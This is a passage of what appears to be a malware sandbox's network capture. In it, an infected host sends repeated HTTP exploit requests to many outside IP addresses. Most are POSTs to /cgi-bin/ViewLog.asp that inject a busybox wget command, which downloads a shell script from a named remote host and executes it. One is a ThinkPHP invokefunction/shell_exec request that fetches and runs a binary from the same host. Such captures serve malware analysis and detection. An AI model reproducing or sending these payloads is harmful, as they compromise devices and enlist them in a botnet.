                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:06.001715899 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:08.689382076 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:14.064616919 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:24.815113068 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:48.107980967 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            926192.168.2.234939631.200.112.278080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:04.050858974 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            927192.168.2.235220285.99.234.1128080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:04.051084042 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:04.300602913 CET1173INHTTP/1.1 404 Not Found
                                                            Server: Apache-Coyote/1.1
                                                            Content-Type: text/html;charset=utf-8
                                                            Content-Language: en
                                                            Content-Length: 989
                                                            Date: Wed, 14 Feb 2024 08:30:32 GMT
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 37 36 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 37 36 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <html><head><title>Apache Tomcat/7.0.76 - Error report</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /cgi-bin/ViewLog.asp</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/cgi-bin/ViewLog.asp</u></p><p><b>description</b> <u>The requested resource is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/7.0.76</h3></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            928192.168.2.233512094.131.8.1778080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:04.051279068 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:04.302030087 CET59INHTTP/1.1 400 Bad Request
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            929192.168.2.234647894.187.236.1308080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:04.260613918 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:04.599426985 CET21INHTTP/1.1
                                                            Data Raw:
                                                            Data Ascii:


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            930192.168.2.235108294.120.46.2118080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:04.822472095 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            931192.168.2.234810494.121.119.2388080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:04.822576046 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            932192.168.2.2339726112.140.38.7580
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:04.882117987 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:05.167601109 CET404INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:30:05 GMT
                                                            Server: Apache
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            933192.168.2.233714631.136.195.188080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:05.276813984 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:05.905735970 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:07.185539961 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:09.713365078 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:14.832494974 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:25.071053028 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:46.060349941 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            934192.168.2.235600862.110.7.188080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:05.297683001 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:05.522789955 CET632INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:30:05 GMT
                                                            Server: Apache/2.4.12 (Ubuntu)
                                                            Content-Length: 438
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 31 2e 31 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p><hr><address>Apache/2.4.12 (Ubuntu) Server at 127.0.1.1 Port 443</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            935192.168.2.235264694.253.33.208080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:05.312063932 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:05.550005913 CET469INHTTP/1.1 500 Internal Server Error
